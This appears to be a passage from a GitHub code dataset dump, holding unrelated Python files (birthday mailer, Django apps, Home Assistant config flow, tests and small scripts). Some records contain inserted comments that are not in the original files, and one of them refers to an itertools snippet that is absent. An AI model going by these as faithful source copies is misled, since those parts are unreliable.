zip(data[\"name\"], data[\"email\"], data[\"day\"], data[\"month\"], data[\"year\"]):\n if dt.datetime.now().day == date and dt.datetime.now().month == month:\n birthday_letter = select_random_letter()\n birthday_letter = birthday_letter.replace(\"[NAME]\", f\"{name}\").replace(\"[year]\", f\"{dt.datetime.now().year - year}\")\n send_wishes(email, birthday_letter)\n\n\ncheck_birthday()\n\n# 3. If step 2 is true, pick a random letter from letter templates and replace the [NAME] with the person's actual name from birthdays.csv\n\n# 4. 
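# Illustrative sketch on the itertools snippet above: the pair test against
# the adjacency matrix can be phrased with combinations() again, checking
# every pair inside each candidate triple (hypothetical helper):
from itertools import combinations
def compatible(triple, bad_pairs):               # bad_pairs: set of frozensets
    return all(frozenset(p) not in bad_pairs for p in combinations(triple, 2))
assert compatible((1, 2, 3), {frozenset({1, 4})})
assert not compatible((1, 2, 3), {frozenset({1, 3})})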
Send the letter generated in step 3 to that person's email address.\n","repo_name":"AakashChahal/100DaysOfCode","sub_path":"birthday-wisher/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33384367371","text":"from django.urls import path\nfrom WEB_BLOG.views import blog, edicionUsuario, fotoPerfil, buscar, crearPost, MandarMensajes\nfrom WEB_LR.views import salir\n\n\n\nurlpatterns = [\n path('blog1/', blog, name='blog'),\n path('salir/', salir, name=\"salir\"),\n path(\"editarPerfil/\", edicionUsuario, name='editarPerfil'),\n path(\"fotoPerfil/\", fotoPerfil, name=\"fotoPerfil\"),\n path(\"buscar/\", buscar, name=\"buscar\"),\n path(\"crear/\", crearPost, name=\"crear\"),\n path(\"chat/\", MandarMensajes, name=\"chat\"),\n]","repo_name":"Rodrigo-M-Medina/-Playground","sub_path":"WEB_BLOG/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17701062123","text":"import sys\nimport collections\nsys.path.append('../graph_neural_net/')\nimport graph_construction, utils\nfrom typing import Dict, Tuple, Counter\nimport numpy as np\n\n[a, graphs_train, b, graphs_test, index_maps] = utils.load_train_test_data('train_test_full')\ngraphs_train, graphs_test = utils.flatten(graphs_train), utils.flatten(graphs_test)\nast_type_index_map, edge_type_index_map, label_index_map = index_maps\n\nprint(len(a))\nprint(a[0])\nprint(len(graphs_train))\n#print(graphs_train[0])\nprint(\"--\")\nprint(len(b))\nprint(b[0])\nprint(len(graphs_test))\n#print(graphs_test[0])\nprint('--')\nprint(len(ast_type_index_map))\nprint(len(edge_type_index_map))\nprint('--')\ndef get_edges(graph):\n ed = 0\n for g in graph:\n ed += len(g['edges'])\n return ed\nprint(get_edges(graphs_train))\nprint(get_edges(graphs_test))\n\n# This code is a clone of\n# a part of graph_construction.graphs_json_to_graph_tuple_and_labels\ndef get_labels(graph):\n node_index_map: Dict[Tuple[int, int], int] = {}\n n_nodes = np.array(list(len(g['nodes']) for g in graph))\n\n for g_idx, g in enumerate(graph):\n for n in g['nodes']:\n nid = n['id']\n if (g_idx, nid) in node_index_map:\n raise ValueError('Duplicate node in graph {}: id {}'.format(g_idx + 1, nid))\n nidx = len(node_index_map)\n node_index_map[(g_idx, nid)] = nidx\n labels = []\n offset = 0\n for g_idx, g in enumerate(graph):\n g_labels = {}\n for l in g['labels']:\n g_labels[node_index_map[(g_idx, l['node'])] - offset] = label_index_map[l['label']]\n offset += n_nodes[g_idx]\n labels.append(g_labels)\n \n print(\"n_nodes: {}\".format(len(n_nodes)))\n sum_n = 0\n for n in n_nodes:\n sum_n += n\n print(\"# nodes: {}\".format(sum_n))\n return labels\n\nlabels_train = get_labels(graphs_train)\nlabels_test = get_labels(graphs_test)\n\ndef get_label_counter(labels):\n label_counter = Counter[int]() \n for g in labels:\n label_counter.update(list(g.values()))\n return label_counter\n\nlabel_counter_train = get_label_counter(labels_train)\nlabel_counter_test = get_label_counter(labels_test)\n\nmajority_vote = label_counter_train.most_common(3)\n\ndef get_accuracy(counter_obj, majority_vote):\n correct = counter_obj[majority_vote]\n total = sum(counter_obj.values())\n print(\"total : {}\".format(total))\n return correct, total, \"{0:.0%}\".format(correct/total)\n\nfor i in range(len(majority_vote)):\n c_train, t_train, acc_train = 
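# The majority-vote baseline above in miniature, with hypothetical labels:
from collections import Counter
labels = [2, 0, 2, 2, 1, 0, 2]
(top_label, count), = Counter(labels).most_common(1)
print(top_label, count / len(labels))            # -> 2 0.5714... (majority-class accuracy)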
get_accuracy(label_counter_train, majority_vote[i][0])\n c_test, t_test, acc_test = get_accuracy(label_counter_test, majority_vote[i][0])\n lbl_name = \"-\"\n for k, v in label_index_map.items():\n if v == majority_vote[i][0]:\n lbl_name = k\n print(\"Label {} when set as the prediction across labels -- \".format(lbl_name))\n print((c_train, t_train, acc_train))\n print((c_test, t_test, acc_test))\n print('==')","repo_name":"shashank-srikant/6.867_term_project","sub_path":"src/experiments/baseline1_majority_vote.py","file_name":"baseline1_majority_vote.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13994516566","text":"from student import *\n\n\ndef read_account(path):\n f = open(path, \"r\", encoding=\"utf-8\")\n list_account = []\n for line in f:\n items = line.split(\"|\")\n account = {\n \"username\": items[0],\n \"password\": items[1]\n }\n list_account.append(account)\n return list_account\n\n\ndef check_account(lst_acc, username, password):\n check = False\n for i in lst_acc:\n if i[\"username\"] == username and i[\"password\"] == password:\n check = True\n return check\n\n\ndef read_data_student(path):\n f = open(path, \"r\", encoding=\"utf-8\")\n list_students = ListStudent([])\n for line in f:\n items = line.split(\",\")\n code = str(items[0])\n name = items[1]\n age = int(items[2])\n gender = True if items[3] == \"True\" else False\n address = items[4]\n math_point = float(items[5])\n physics_point = float(items[6])\n chem_point = float(items[7])\n student = Student(code, name, age, gender, address, math_point, physics_point, chem_point, )\n list_students.add_new(student)\n return list_students\n\n\ndef write_new_line(path, student):\n string = student.__str__()\n with open(path, \"a\", encoding=\"utf-8\") as f:\n f.write(f\"{string}\\n\")\n\n\ndef remove_line(path, index):\n with open(path, 'r', encoding=\"utf-8\") as file:\n lines = file.readlines()\n del lines[index]\n with open(path, 'w', encoding=\"utf-8\") as file:\n file.writelines(lines)\n\n\ndef update_line(path, index):\n with open(path, 'r', encoding=\"utf-8\") as file:\n lines = file.readlines()\n del lines[index]\n with open(path, 'w', encoding=\"utf-8\") as file:\n file.writelines(lines)\n\n\ndef update(path, index):\n with open(path, 'r') as file:\n data = file.readlines()\n data[index] = \"huân \"\n with open(path, 'w', encoding=\"utf-8\") as file:\n file.writelines(data)\n\n\ndef write_down_file(path, list_student):\n with open(path, 'w') as file:\n for student in list_student:\n file.writelines(student.__str__()+\"\\n\")\n\n# remove_line(\"data/list_students.txt\", 7)\n# read_data_student(\"data/list_students.txt\")\n","repo_name":"Nguyen-huan/case-study","sub_path":"manipulationData.py","file_name":"manipulationData.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70010416487","text":"# -*- coding:utf-8 -*-\n\n#\nimport logging\nimport os\n\n# maya\nimport pymel.core as pm\n\nfrom mbox import menu\n# mbox\nfrom mbox import version\n\nmenu_id = \"mBox\"\nlogger = logging.getLogger()\n\n\ndef environ():\n os.environ[\"MBOX_ROOT\"] = os.path.normpath(os.path.join(__file__, os.path.pardir, os.path.pardir, os.path.pardir))\n os.environ[\"MBOX_PYTHON\"] = os.path.normpath(os.path.dirname(__file__))\n os.environ[\"MBOX_MODULES\"] = os.path.normpath(os.path.join(os.path.dirname(__file__), \"box\", 
\"modules\"))\n os.environ[\"MBOX_BOX\"] = os.path.normpath(os.path.join(os.environ[\"MBOX_PYTHON\"], \"lego\", \"box\"))\n os.environ[\"MBOX_CUSTOM_BOX\"] = \"\"\n os.environ[\"MBOX_CUSTOM_MODULES\"] = \"\"\n os.environ[\"MBOX_CUSTOM_STEP_PATH\"] = \"\"\n\n\ndef mbox_menu():\n \"\"\"mbox menu setup\n\n :return:\n \"\"\"\n menu.create(menu_id)\n\n\ndef about():\n \"\"\"\n\n :return:\n \"\"\"\n mbox_msg = (\"\\nmbox version : {0}\\n\\n\"\n \"mbox started with the aim of studying mgear. Therefore, most core functions come from mgear. \"\n \"mgear is the best rigging framework. But mgear's inheritance was a bit complicated for me. \"\n \"So I think I revised it in an easier way. \"\n \"My programming level is still low, so things I've changed may have gone in the wrong direction.\\n\\n\"\n \"\".format(version.mbox))\n\n mbox_dir = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))\n license_file = os.path.join(mbox_dir, \"LICENSE\")\n with open(license_file, \"r\") as f:\n license_msg = f.readlines()\n for l_msg in license_msg:\n mbox_msg += \"{0}\".format(l_msg)\n\n pm.confirmDialog(title=\"About mbox\",\n message=mbox_msg,\n button=[\"OK\"],\n defaultButton=\"OK\",\n cancelButton=\"OK\",\n dismissString=\"OK\")\n","repo_name":"chowooseung/mbox","sub_path":"scripts/mbox/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36921082490","text":"import csv\nimport os\nimport random\n\nfrom django.contrib.auth import get_user_model\nfrom django.core.management.base import BaseCommand\n\nfrom sales.models.product import Product\nfrom sales.models.sale import Sale\n\nUser = get_user_model()\n\n\nclass Command(BaseCommand):\n help = 'Fills the Seller table with data'\n\n def handle(self, *args, **options):\n path = 'sales/management/files/sales.csv'\n file_exists = os.path.exists(path)\n if not file_exists:\n self.stdout.write(self.style.ERROR('Directory Not Found'))\n return None\n\n user_ids = list(User.objects.all().values_list('id', flat=True))\n with open(path, 'r') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n line_count += 1\n else:\n # assign sale to random user\n sale = Sale(\n date=row[0],\n sales_number=row[1],\n revenue=row[2],\n product=Product.objects.get(name=row[3]),\n user_id=User.objects.get(id=random.choice(user_ids)))\n sale.save()\n line_count += 1\n self.stdout.write(self.style.SUCCESS(f'Successfully imported {line_count} sales'))\n","repo_name":"5DcOOKIE/Haseeb_Arshad_Assignment_ROUND2","sub_path":"sales/management/commands/fill_sales.py","file_name":"fill_sales.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22307307832","text":"from Backend.backgroundEvents.base import BaseEvent\nfrom Backend.bungio.client import get_bungio_client\nfrom Backend.core.errors import CustomException\nfrom Backend.crud import persistent_messages, rss_feed\nfrom Backend.database.base import acquire_db_session\nfrom Backend.networking.elevatorApi import ElevatorApi\n\n\nclass RssFeedChecker(BaseEvent):\n \"\"\"Checks for new Bungie Articles\"\"\"\n\n def __init__(self):\n interval_minutes = 5\n super().__init__(scheduler_type=\"interval\", interval_minutes=interval_minutes)\n\n async def run(self):\n bungio_client = get_bungio_client()\n news = await 
bungio_client.api.rss_news_articles(page_token=\"0\", includebody=False)\n\n async with acquire_db_session() as db:\n # loop through the articles and check if they have been published\n to_publish = []\n for item in news.news_articles:\n if not await rss_feed.get(db=db, item_id=item.unique_identifier):\n to_publish.append(item)\n else:\n # dont need to re-check all of them every time\n break\n\n if to_publish:\n # get all guilds that have subscribed\n subscribed_data = []\n for subscribed in await persistent_messages.get_all_name(db=db, message_name=\"rss\"):\n subscribed_data.append(\n {\n \"guild_id\": subscribed.guild_id,\n \"channel_id\": subscribed.channel_id,\n }\n )\n\n # loop through the items to publish and do that\n try:\n elevator_api = ElevatorApi()\n for item in to_publish:\n data = {\n \"embed_title\": item.title,\n \"embed_description\": f\"[{item.description}]({bungie_url(item.link)})\",\n \"embed_image_url\": item.image_path,\n \"guilds\": subscribed_data,\n }\n\n # send the payload to elevator\n result = await elevator_api.post(\n route=\"/messages\",\n json=data,\n )\n\n # remove db entry if channel doesnt exist\n if result:\n if not result.content[\"success\"]:\n for error_guild in result.content[\"guilds\"]:\n await persistent_messages.delete(\n db=db, message_name=\"rss\", guild_id=error_guild[\"guild_id\"]\n )\n\n # save item in DB\n await rss_feed.insert(db=db, item_id=item.unique_identifier)\n except CustomException:\n pass\n\n\ndef bungie_url(url: str) -> str:\n if \"bungie.net\" not in url:\n url = f\"https://www.bungie.net{url}\"\n return url\n","repo_name":"TheDescend/elevatorbot","sub_path":"Backend/backgroundEvents/rssFeedChecker.py","file_name":"rssFeedChecker.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"16111019329","text":"import io\nimport asyncio\n\nimport pytest\n\nfrom aioconsole import compat\nfrom aioconsole.server import start_console_server, print_server\n\n\n@pytest.mark.asyncio\nasync def test_server(event_loop):\n server = await start_console_server(host=\"127.0.0.1\", port=0, banner=\"test\")\n address = server.sockets[0].getsockname()\n\n stream = io.StringIO()\n print_server(server, \"test console\", file=stream)\n expected = f\"The test console is being served on 127.0.0.1:{address[1]}\\n\"\n assert stream.getvalue() == expected\n\n reader, writer = await asyncio.open_connection(*address)\n assert (await reader.readline()) == b\"test\\n\"\n writer.write(b\"1+1\\n\")\n assert (await reader.readline()) == b\">>> 2\\n\"\n writer.write_eof()\n assert (await reader.readline()) == b\">>> \\n\"\n writer.close()\n await writer.wait_closed()\n server.close()\n await server.wait_closed()\n\n\n@pytest.mark.asyncio\nasync def test_uds_server(event_loop, tmpdir_factory):\n path = str(tmpdir_factory.mktemp(\"uds\") / \"my_uds\")\n\n # Not available on windows\n if compat.platform == \"win32\":\n with pytest.raises(ValueError):\n await start_console_server(path=path, banner=\"test\")\n return\n\n server = await start_console_server(path=path, banner=\"test\")\n\n stream = io.StringIO()\n print_server(server, \"test console\", file=stream)\n expected = f\"The test console is being served on {path}\\n\"\n assert stream.getvalue() == expected\n\n address = server.sockets[0].getsockname()\n reader, writer = await asyncio.open_unix_connection(address)\n assert (await reader.readline()) == b\"test\\n\"\n writer.write(b\"1+1\\n\")\n assert (await 
reader.readline()) == b\">>> 2\\n\"\n writer.write_eof()\n assert (await reader.readline()) == b\">>> \\n\"\n writer.close()\n await writer.wait_closed()\n server.close()\n await server.wait_closed()\n\n\n@pytest.mark.asyncio\nasync def test_invalid_server(event_loop):\n with pytest.raises(ValueError):\n await start_console_server()\n with pytest.raises(ValueError):\n await start_console_server(path=\"uds\", port=0)\n","repo_name":"vxgmichel/aioconsole","sub_path":"tests/test_server.py","file_name":"test_server.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":425,"dataset":"github-code","pt":"53"} +{"seq_id":"70161941927","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# Define the system parameters\nM = np.eye(2) # identity matrix\nK = np.array([[1, -1], [-1, 1]]) # stiffness matrix\nT0 = 1.0 # amplitude of applied moment\nOmega = 2.0 * np.pi # frequency of applied moment\n\n# Solve the generalized eigenvalue problem to find natural frequencies and mode shapes\nevals, evecs = np.linalg.eig(np.linalg.inv(M) @ K)\nomegas = np.sqrt(-evals)\nmodes = evecs.T\n\n# Define the frequency range to calculate the frequency response function\nw = np.linspace(0, 10, 1000)\n\n# Calculate the frequency response function for each natural frequency and mode shape\nHw = np.zeros_like(w, dtype=np.complex128)\nfor i, omega in enumerate(omegas):\n mode = modes[i]\n num = T0 * mode[0] * omega**2\n den = (1j*w)**2 + 2*0.01*omega*1j*w + omega**2\n Hw += num / den\n\n# Plot the magnitude and phase of the frequency response function\nfig, ax = plt.subplots(2, 1)\nax[0].plot(w, abs(Hw))\nax[0].set_ylabel('Magnitude')\nax[1].plot(w, np.angle(Hw))\nax[1].set_ylabel('Phase')\nax[1].set_xlabel('Frequency')\nplt.show()\n","repo_name":"LorenzoCucchi/Lecture-Notes","sub_path":"Aeroelasticity/notes/exercitation/01/prova.py","file_name":"prova.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7550002866","text":"import pandas as pd\nimport numpy as np\nimport re\n\n#PATH = 'queen2_exp_00001.dat'\n\n# def parse(path):\n# \tarr = []\n# \tdata = []\n# \twith open(path, 'r') as f:\n# \t\tfor dpt in f:\n# \t\t\tfor d in dpt.split(','):\n# \t\t\t\td=d.strip()\n# \t\t\t\tarr.append(d)\n# \t\t\tdata.append(arr)\n# \t\t\tarr=[]\n\n# \tdf = pd.DataFrame(data)\n# \t#print(df)\n\n# \t# df.to_csv(r'data.csv')\n# \treturn df\n\ndef parse(path):\n\tarr = []\n\tf = open(path, 'r')\n\tfor dp in f:\n\t\t\n\t\tarr.append(dp.split())\n\t\t# print(arr)\n\t\t# exit(0)\n\tf.close()\n\n\tdf = pd.DataFrame(arr)\n\tdf = df[1:]\n\tprint(df.head())\n\t# new_df = df[0].str.split(expand=True)\n\t# print(new_df.head())\n\n\t# df.to_csv(r'data.csv')\n\treturn df\n\nif __name__ == '__main__':\n\tpath = 'C:/Users/Tript/Desktop/What!/asme/cavity/postProcessing/probes/0'\n\n\t#get press data\n\tppath = path+'/p.dat'\n\n\t#get vel data\n\tvpath = path+'/U.dat'\n\tpass\n\n\tpdf = parse(ppath)\n\tpdf.to_csv(r'datap.csv', index=False)\n\n\tvdf = parse(vpath)\n\tvdf.to_csv(r'datav.csv', index=False)\n","repo_name":"TriptSharma/mlpiv","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24878229597","text":"\"\"\"List all records in a zone.\"\"\"\n# :license: MIT, see LICENSE for more details.\n\nimport click\n\nimport SoftLayer\nfrom SoftLayer.CLI 
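# Note on the two-mass vibration snippet above: for M = I and
# K = [[1, -1], [-1, 1]], eig(inv(M) @ K) returns the NON-negative values
# {2, 0}, so omegas = np.sqrt(-evals) evaluates to nan. For M x'' + K x = 0
# the undamped natural frequencies are sqrt(+evals). Minimal check:
import numpy as np
K = np.array([[1.0, -1.0], [-1.0, 1.0]])
evals, _ = np.linalg.eig(K)                      # M is the identity, so inv(M) @ K == K
print(np.sqrt(evals))                            # ~ [1.41421356, 0.] up to ordering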
import environment\nfrom SoftLayer.CLI import formatting\nfrom SoftLayer.CLI import helpers\n# pylint: disable=redefined-builtin, redefined-argument-from-local\n\n\n@click.command()\n@click.argument('zone')\n@click.option('--data', help='Record data, such as an IP address')\n@click.option('--record', help='Host record, such as www')\n@click.option('--ttl',\n type=click.INT,\n help='TTL value in seconds, such as 86400')\n@click.option('--type', help='Record type, such as A or CNAME')\n@environment.pass_env\ndef cli(env, zone, data, record, ttl, type):\n \"\"\"List all records in a zone.\"\"\"\n\n manager = SoftLayer.DNSManager(env.client)\n table = formatting.Table(['id', 'record', 'type', 'ttl', 'data'])\n\n table.align['ttl'] = 'l'\n table.align['record'] = 'r'\n table.align['data'] = 'l'\n\n zone_id = helpers.resolve_id(manager.resolve_ids, zone, name='zone')\n\n records = manager.get_records(zone_id,\n record_type=type,\n host=record,\n ttl=ttl,\n data=data)\n\n for the_record in records:\n table.add_row([\n the_record['id'],\n the_record['host'],\n the_record['type'].upper(),\n the_record['ttl'],\n the_record['data']\n ])\n\n env.fout(table)\n","repo_name":"itirohidaka/PowerOff-Functions","sub_path":"virtualenv/lib/python2.7/site-packages/SoftLayer/CLI/dns/record_list.py","file_name":"record_list.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"24802298970","text":"import csv\nimport sys\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nmatplotlib.use('Qt5Agg')\n\n\ndef main(filename):\n try:\n with open(filename, \"r\") as file:\n reader = csv.reader(file, 'excel')\n headers = []\n data = []\n for row in reader:\n if not headers:\n headers = list(row)\n index_need = headers.index(\"Motion\")\n else:\n data.append(list(row)[index_need])\n x = [i for i in range(len(data))]\n plt.plot(x, data)\n plt.show()\n\n\n except FileNotFoundError:\n print(\"Файл не найден\")\n\n\nif __name__ == '__main__':\n if len(sys.argv) >= 2:\n main(filename=sys.argv[1])\n else:\n print(\"Укажите название файла с записями\")\n","repo_name":"Bobako/4emodan","sub_path":"task8/view_results.py","file_name":"view_results.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9795259679","text":"import pygame\nimport os\nimport random\nimport math\nimport pandas\n\n\n\nclass Player(object):\n def __init__(self,market):\n self.money = 10000\n self.stocksInHand = [market[0].stock, market[1].stock, market[2].stock]\n self.stockAmount = [0,0,0]\n\n self.numStocks = 0\n self.maxNumStocks = 10\n \n def buyStocks(self, i, market):\n if market[i].amount <= 0 or self.money < market[i].stock.buyPrice:\n return\n market[i].amount -= 1 #asset\n self.stockAmount[i] += 1\n self.money -= market[i].stock.buyPrice\n\n def sellStocks(self, i, market):\n if self.stockAmount[i] <= 0:\n return\n market[i].amount += 1 #asset\n self.stockAmount[i] -= 1\n self.money += market[i].stock.sellPrice\n\nclass Stock(object):\n def __init__(self, name, buyPrice):\n self.name = name\n self.buyPrice = round(buyPrice,2)\n self.sellPrice = round(buyPrice,2)\n \n def updateStock(self, newPrice):\n self.sellPrice = round(newPrice,2)\n \n def updateMarketStock(self, newPrice):\n self.buyPrice = round(newPrice,2)\n self.sellPrice = round(newPrice,2)\n def __eq__(self,other):\n return type(other) == type(self) and self.name == other.name\n \n \n 
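# Note, illustrative and not part of the original file: a class that defines
# __eq__ without __hash__, like Stock above, has __hash__ set to None in
# Python 3, so instances cannot be dict keys or set members. If that is ever
# needed, hash the same field that __eq__ compares:
#
#     def __hash__(self):
#         return hash(self.name)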
\nclass Asset(object):\n def __init__(self, amount, stock):\n self.amount = amount\n self.stock = stock\n \n def __repr__(self):\n return self.stock.name + \" \" + str(self.amount) + \" \" + str(self.stock.buyPrice) + \" \" + str(self.stock.sellPrice) +\\\n \" \"\n \nclass Calendar(object):\n def __init__(self):\n self.month = 1\n self.day = 1\n self.year = 2000\n \n def nextDay(self):\n self.day += 1\n \nclass Background(pygame.sprite.Sprite):\n def __init__(self, filePath):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.transform.scale (pygame.image.load(os.path.join('Assets',\n 'Backgrounds',filePath)).convert(), (1200, 800))\n self.rect = self.image.get_rect()\n self.image.set_colorkey((0,0,0))\n self.rect.left = 0\n self.rect.top = 0\n \nclass Layer(pygame.sprite.Sprite):\n def __init__(self, x, y, filePath, scale):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.transform.scale(pygame.image.load(os.path.join('Assets', 'Backgrounds', filePath)).convert(), scale)\n self.rect = self.image.get_rect()\n self.rect.centerx = x\n self.rect.centery = y\n \nclass Button(pygame.sprite.Sprite):\n def __init__(self, x, y, filePath, scale, action):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.transform.scale(pygame.image.load(os.path.join('Assets', 'Backgrounds',filePath)).convert(), scale)\n self.rect = self.image.get_rect()\n self.rect.centerx = x\n self.rect.centery = y\n self.action = action\n \n def update(self,mousePos,click):\n if self.rect.left <= mousePos[0] <= self.rect.right and self.rect.top <= mousePos[1] <= self.rect.bottom:\n if click[0]:\n print(\"Click!\")\n self.action()\nclass SellButton(Button):\n def __init__(self, x, y, filePath, scale, action, player,market, index):\n super().__init__(x, y, filePath,scale, action)\n #self.action = {sell, buy}\n self.index = index\n self.player = player\n self.market = market\n\n def update(self, mousePos, click):\n if self.rect.left <= mousePos[0] <= self.rect.right and self.rect.top <= mousePos[1] <= self.rect.bottom:\n if click[0]:\n print(\"Click!\")\n if self.action == \"sell\":\n self.player.sellStocks(self.index, self.market)\n elif self.action == \"buy\":\n self.player.buyStocks(self.index, self.market)\n","repo_name":"CharlieLiu0616/HackCMU2019","sub_path":"Stock MLaster/Classes.py","file_name":"Classes.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6216045249","text":"from django.test import TestCase\nimport pytest\nfrom channels.testing import WebsocketCommunicator\n\nfrom trades.calculator import percentage_calculator\nfrom live import api\nfrom live.consumers import LiveConsumer\nfrom trades.management.commands import dbinsert\nfrom trades.models import CurrencyPair\n\n\n@pytest.mark.django_db(transaction=True)\n@pytest.mark.asyncio\nasync def test_my_consumer_connects(self):\n communicator = WebsocketCommunicator(LiveConsumer.as_asgi(), \"/ws/live/\")\n connected, subprotocol = await communicator.connect()\n assert connected\n await communicator.send(\n {\"action\": \"test_async_action\", \"pk\": 2, \"request_id\": 1}\n )\n\n response = await communicator.receive()\n\n assert response == {\n \"errors\": [],\n \"data\": {\"pk\": 2},\n \"action\": \"test_async_action\",\n \"response_status\": 200,\n \"request_id\": 1,\n }\n\n # Test on connection welcome message\n # user = await communicator.receive_from()\n # assert user == 'test'\n # Close\n await 
communicator.disconnect()\n\n\n\"\"\" Tests the calculator file \"\"\"\n\n\nclass CalculatorTestCase(TestCase):\n\n # Test the percentage calculator function\n def test_percentage_calculator(self):\n\n # Mock the data needed to run the function\n total_val = 1000\n partial_pos_val = 250\n partial_ne_val = -250\n\n # Checks if the result is what is expected with positive values\n self.assertEqual(percentage_calculator(total_val, partial_pos_val), 25)\n\n # Checks if the result is what is expected with negative values\n self.assertEqual(percentage_calculator(total_val, partial_ne_val), -25)\n\n\n\"\"\" Tests the api file functions\"\"\"\n\n\nclass ApiTestCase(TestCase):\n def setUp(self):\n self.fetcher = api.DataFetcher(\"EURUSD=X\", \"1d\", \"30m\")\n\n # Tests the get historical data function\n def test_get_historical_data(self):\n\n # Runs the function\n response = self.fetcher.get_historical_data()\n # Gets the open column from the response\n tick_open = response[\"Open\"]\n # Checks if the column has values\n self.assertTrue(len(tick_open))\n\n # Tests the convert ticker to line function\n def test_convert_ticker_to_line(self):\n\n # Creates a dictionary\n test_dict = {}\n fetcher_dict = self.fetcher.convert_ticker_to_line()\n # Checks if the function returns a dictionary\n self.assertTrue(type(fetcher_dict) == type(test_dict))\n\n # Tests the get real time data function\n def test_get_real_time_data(self):\n\n # Runs the function\n result = self.fetcher.get_real_time_data()\n\n # Verifies function is iterable\n self.assertTrue(len(result))\n\n\nclass DbInsert(TestCase):\n\n def test_dbinsert(self):\n\n initial_vals = len(CurrencyPair.objects.all())\n dbinsert.Command.handle(self)\n new_vals = len(CurrencyPair.objects.all())\n assert(new_vals > initial_vals)\n","repo_name":"Heightsdesign/forex_performance_tracker","sub_path":"tests/test_custom_files.py","file_name":"test_custom_files.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36232870305","text":"\"\"\"Config flow for njsPC-HA integration.\"\"\"\nfrom __future__ import annotations\n\nimport logging\nfrom typing import Any\n\nimport voluptuous as vol\n\nfrom homeassistant import config_entries\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.data_entry_flow import FlowResult\nfrom homeassistant.exceptions import HomeAssistantError\nfrom homeassistant.helpers import aiohttp_client\nfrom homeassistant.components import zeroconf, ssdp\nfrom urllib.parse import urlparse\n\n\nfrom homeassistant.const import CONF_HOST, CONF_PORT\n\nfrom .const import DOMAIN\n\n_LOGGER = logging.getLogger(__name__)\n\nSTEP_USER_DATA_SCHEMA = vol.Schema(\n {\n vol.Required(CONF_HOST): str,\n vol.Required(CONF_PORT, default=4200): int,\n }\n)\n\n\nasync def validate_input(hass: HomeAssistant, data: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Validate the user input allows us to connect.\n\n Data has the keys from STEP_USER_DATA_SCHEMA with values provided by the user.\n \"\"\"\n session = aiohttp_client.async_get_clientsession(hass)\n async with session.get(f'http://{data[\"host\"]}:{data[\"port\"]}/state/all') as resp:\n if resp.status == 200:\n pass\n else:\n raise CannotConnect\n\n return {\"title\": \"njsPC-HA\"}\n\n\nclass ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):\n \"\"\"Handle a config flow for njsPC-HA.\"\"\"\n\n VERSION = 1\n\n def __init__(self) -> None:\n \"\"\"Initialize.\"\"\"\n self.zero_conf = None\n 
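# (editor's note, added for clarity) these attributes cache discovery results so the\n        # zeroconf and ssdp steps below can pass host/port on to their *_confirm steps\n        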
self.host = None\n self.port = None\n self.server_id = None\n self.controller_name = None\n\n async def async_step_user(\n self, user_input: dict[str, Any] | None = None\n ) -> FlowResult:\n \"\"\"Handle the initial step.\"\"\"\n if user_input is None:\n return self.async_show_form(\n step_id=\"user\", data_schema=STEP_USER_DATA_SCHEMA\n )\n\n errors = {}\n\n try:\n info = await validate_input(self.hass, user_input)\n self.server_id = f'njspcha_{user_input[CONF_HOST].replace(\".\", \"\")}{user_input[CONF_PORT]}'\n await self.async_set_unique_id(self.server_id)\n self._abort_if_unique_id_configured()\n except CannotConnect:\n errors[\"base\"] = \"cannot_connect\"\n except Exception: # pylint: disable=broad-except\n _LOGGER.exception(\"Unexpected exception\")\n errors[\"base\"] = \"unknown\"\n else:\n return self.async_create_entry(title=info[\"title\"], data=user_input)\n\n return self.async_show_form(\n step_id=\"user\", data_schema=STEP_USER_DATA_SCHEMA, errors=errors\n )\n\n async def async_step_zeroconf(\n self, discovery_info: zeroconf.ZeroconfServiceInfo\n ) -> FlowResult:\n \"\"\"Handle zeroconf discovery.\"\"\"\n self.zero_conf = discovery_info\n self.server_id = (\n f'njspcha_{discovery_info.host.replace(\".\", 